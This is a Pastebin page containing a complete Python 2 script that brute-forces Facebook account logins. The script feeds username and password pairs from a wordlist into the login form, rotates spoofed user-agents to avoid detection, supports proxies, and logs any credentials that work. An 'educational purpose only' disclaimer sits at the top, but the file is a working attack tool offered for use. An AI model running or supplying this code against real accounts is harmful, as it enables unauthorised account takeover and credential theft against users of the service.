API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Feb 21st, 2012
3,776
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 8.49 KB | None | 0 0
raw download clone embed print report
  1. # FOR EDUCATIONAL PURPOSE ONLY
  2. #!/usr/bin/python
  3. # This is facebook bruteforcer tools
  4. # This was written for educational purpose and pentest only. Use it at your own risk.
  5. # Author will not be responsible for any damage !!
  6. # Toolname  : facebookbruteforcer.py
  7. # Programmer    : Gunslinger_ <yudha.gunslinger@gmail.com>
  8. # Version   : 1.0
  9. # Date      : Tue Jul 27 13:24:44 WIT 2010
  10. # Special thanks to mywisdom to inspire me ;)
  11.  
  12. import re
  13. import os
  14. import sys
  15. import random
  16. import warnings
  17. import time
  18. try:
  19.     import mechanize
  20. except ImportError:
  21.     print "[*] Please install mechanize python module first"
  22.     sys.exit(1)
  23. except KeyboardInterrupt:
  24.     print "\n[*] Exiting program...\n"
  25.     sys.exit(1)
  26. try:
  27.     import cookielib
  28. except ImportError:
  29.     print "[*] Please install cookielib python module first"
  30.     sys.exit(1)
  31. except KeyboardInterrupt:
  32.     print "\n[*] Exiting program...\n"
  33.     sys.exit(1)
  34.  
  35. warnings.filterwarnings(action="ignore", message=".*gzip transfer encoding is experimental!", category=UserWarning)
  36.  
  37. # define variable
  38. __programmer__  = "gunslinger_ <yudha.gunslinger@gmail.com>"
  39. __version__     = "1.0"
  40. verbose     = False
  41. useproxy    = False
  42. usepassproxy    = False
  43. log     = 'fbbruteforcer.log'
  44. file        = open(log, "a")
  45. success     = 'http://www.facebook.com/?sk=messages&amp;ref=mb'
  46. fblogin     = 'https://login.facebook.com/login.php?login_attempt=1'
  47. # some cheating ..
  48. ouruseragent    = ['Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.10 sun4u; X11)',
  49.         'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2pre) Gecko/20100207 Ubuntu/9.04 (jaunty) Namoroka/3.6.2pre',
  50.         'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser;',
  51.         'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)',
  52.             'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)',
  53.             'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)',
  54.             'Microsoft Internet Explorer/4.0b1 (Windows 95)',
  55.             'Opera/8.00 (Windows NT 5.1; U; en)',
  56.         'amaya/9.51 libwww/5.4.0',
  57.         'Mozilla/4.0 (compatible; MSIE 5.0; AOL 4.0; Windows 95; c_athome)',
  58.         'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)',
  59.         'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)',
  60.         'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; ZoomSpider.net bot; .NET CLR 1.1.4322)',
  61.         'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; QihooBot 1.0 qihoobot@qihoo.net)',
  62.         'Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 5.11 [en]'
  63.         ]
  64. facebook    = '''
  65.  __               _                 _
  66. / _|             | |               | |
  67. | |_ __ _  ___ ___| |__   ___   ___ | | __
  68. |  _/ _` |/ __/ _ \ '_ \ / _ \ / _ \| |/ /
  69. | || (_| | (_|  __/ |_) | (_) | (_) |   <
  70. |_| \__,_|\___\___|_.__/ \___/ \___/|_|\_\\
  71.                     bruteforcer...
  72.  
  73. Programmer : %s
  74. Version    : %s''' % (__programmer__, __version__)
  75. option          = '''
  76. Usage  : %s [options]
  77. Option : -u, --username     <username>      |   User for bruteforcing
  78.          -w, --wordlist     <filename>      |   Wordlist used for bruteforcing
  79.          -v, --verbose              |   Set %s will be verbose
  80.          -p, --proxy        <host:port> |   Set http proxy will be use
  81.          -k, --usernameproxy    <username>  |   Set username at proxy will be use
  82.          -i, --passproxy    <password>  |   Set password at proxy will be use
  83.          -l, --log      <filename>  |   Specify output filename (default : fbbruteforcer.log)
  84.          -h, --help         <help>          |   Print this help
  85.  
  86. Example : %s -u brad@hackme.com -w wordlist.txt"
  87.  
  88. P.S : add "&" to run in the background
  89. ''' % (sys.argv[0], sys.argv[0], sys.argv[0])
  90. hme         = '''
  91. Usage : %s [option]
  92.     -h or --help for get help
  93.     ''' % sys.argv[0]
  94.  
  95. def helpme():
  96.     print facebook
  97.     print option
  98.     file.write(facebook)
  99.     file.write(option)
  100.     sys.exit(1)
  101.  
  102. def helpmee():
  103.     print facebook
  104.     print hme
  105.     file.write(facebook)
  106.     file.write(hme)
  107.     sys.exit(1)
  108.  
  109. for arg in sys.argv:
  110.     try:
  111.         if arg.lower() == '-u' or arg.lower() == '--user':
  112.                     username = sys.argv[int(sys.argv[1:].index(arg))+2]
  113.         elif arg.lower() == '-w' or arg.lower() == '--wordlist':
  114.                     wordlist = sys.argv[int(sys.argv[1:].index(arg))+2]
  115.             elif arg.lower() == '-l' or arg.lower() == '--log':
  116.                     log = sys.argv[int(sys.argv[1:].index(arg))+2]
  117.             elif arg.lower() == '-p' or arg.lower() == '--proxy':
  118.                 useproxy = True
  119.                     proxy = sys.argv[int(sys.argv[1:].index(arg))+2]
  120.             elif arg.lower() == '-k' or arg.lower() == '--userproxy':
  121.                 usepassproxy = True
  122.                     usw = sys.argv[int(sys.argv[1:].index(arg))+2]
  123.             elif arg.lower() == '-i' or arg.lower() == '--passproxy':
  124.                 usepassproxy = True
  125.                     usp = sys.argv[int(sys.argv[1:].index(arg))+2]
  126.         elif arg.lower() == '-v' or arg.lower() == '--verbose':
  127.                     verbose = True
  128.             elif arg.lower() == '-h' or arg.lower() == '--help':
  129.                 helpme()
  130.         elif len(sys.argv) <= 1:
  131.             helpmee()
  132.     except IOError:
  133.         helpme()
  134.     except NameError:
  135.         helpme()
  136.     except IndexError:
  137.         helpme()
  138.  
  139. def bruteforce(word):
  140.     try:
  141.         #sys.stdout.write("\r[*] Trying %s...                    " % word)
  142.         pos = word.find("::")
  143.         username = word[0:pos]
  144.         word = word[pos+len("::"):len(word)]
  145.        
  146.         print("Username: " + username )
  147.         print("password: " + word )
  148.         file.write("[*] Trying " + username + "::" + word + "\n" )
  149.         sys.stdout.flush()
  150.         br.addheaders = [('User-agent', random.choice(ouruseragent))]
  151.         opensite = br.open(fblogin)
  152.         br.select_form(nr=0)
  153.         br.form['email'] = username
  154.         br.form['pass'] = word
  155.         br.submit()
  156.         response = br.response().read()
  157.         if verbose:
  158.             print response
  159.         if success in response:
  160.             print "\n\n[*] Logging in success..."
  161.             print "[*] Username : %s" % (username)
  162.             print "[*] Password : %s\n" % (word)
  163.             file.write("\n[*] Logging in success...")
  164.             file.write("\n[*] Username : %s" % (username))
  165.             file.write("\n[*] Password : %s\n\n" % (word))
  166.             sys.exit(1)
  167.     except KeyboardInterrupt:
  168.         print "\n[*] Exiting program...\n"
  169.         sys.exit(1)
  170.     except mechanize._mechanize.FormNotFoundError:
  171.         print "\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n"
  172.         file.write("\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n")
  173.         sys.exit(1)
  174.     except mechanize._form.ControlNotFoundError:
  175.         print "\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n"
  176.         file.write("\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n")
  177.         sys.exit(1)
  178.  
  179. def releaser():
  180.     global word
  181.     for word in words:
  182.         bruteforce(word.replace("\n",""))
  183.  
  184. def main():
  185.     global br
  186.     global words
  187.     try:
  188.         br = mechanize.Browser()
  189.         cj = cookielib.LWPCookieJar()
  190.         br.set_cookiejar(cj)
  191.         br.set_handle_equiv(True)
  192.         br.set_handle_gzip(True)
  193.         br.set_handle_redirect(True)
  194.         br.set_handle_referer(True)
  195.         br.set_handle_robots(False)
  196.         br.set_debug_http(False)
  197.         br.set_debug_redirects(False)
  198.         br.set_debug_redirects(False)
  199.         br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
  200.         if useproxy:
  201.             br.set_proxies({"http": proxy})
  202.         if usepassproxy:
  203.             br.add_proxy_password(usw, usp)
  204.         if verbose:
  205.             br.set_debug_http(True)
  206.             br.set_debug_redirects(True)
  207.             br.set_debug_redirects(True)
  208.     except KeyboardInterrupt:
  209.         print "\n[*] Exiting program...\n"
  210.         file.write("\n[*] Exiting program...\n")
  211.         sys.exit(1)
  212.     try:
  213.         preventstrokes = open(wordlist, "r")
  214.         words          = preventstrokes.readlines()
  215.         count          = 0
  216.         while count < len(words):
  217.             words[count] = words[count].strip()
  218.             count += 1
  219.     except IOError:
  220.         print "\n[*] Error: Check your wordlist path\n"
  221.         file.write("\n[*] Error: Check your wordlist path\n")
  222.         sys.exit(1)
  223.     except NameError:
  224.         helpme()
  225.     except KeyboardInterrupt:
  226.         print "\n[*] Exiting program...\n"
  227.         file.write("\n[*] Exiting program...\n")
  228.         sys.exit(1)
  229.     try:
  230.         print facebook
  231.         print "\n[*] Starting attack at %s" % time.strftime("%X")
  232.         #print "[*] Account for bruteforcing %s" % (username)
  233.         print "[*] Loaded :",len(words),"words"
  234.         print "[*] Bruteforcing, please wait..."
  235.         file.write(facebook)
  236.         file.write("\n[*] Starting attack at %s" % time.strftime("%X"))
  237.         #file.write("\n[*] Account for bruteforcing %s" % (username))
  238.         file.write("\n[*] Loaded : %d words" % int(len(words)))
  239.         file.write("\n[*] Bruteforcing, please wait...\n")
  240.     except KeyboardInterrupt:
  241.         print "\n[*] Exiting program...\n"
  242.         sys.exit(1)
  243.     try:
  244.         releaser()
  245.         bruteforce(word)
  246.     except NameError:
  247.         helpme()
  248.  
  249. if __name__ == '__main__':
  250.     main()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!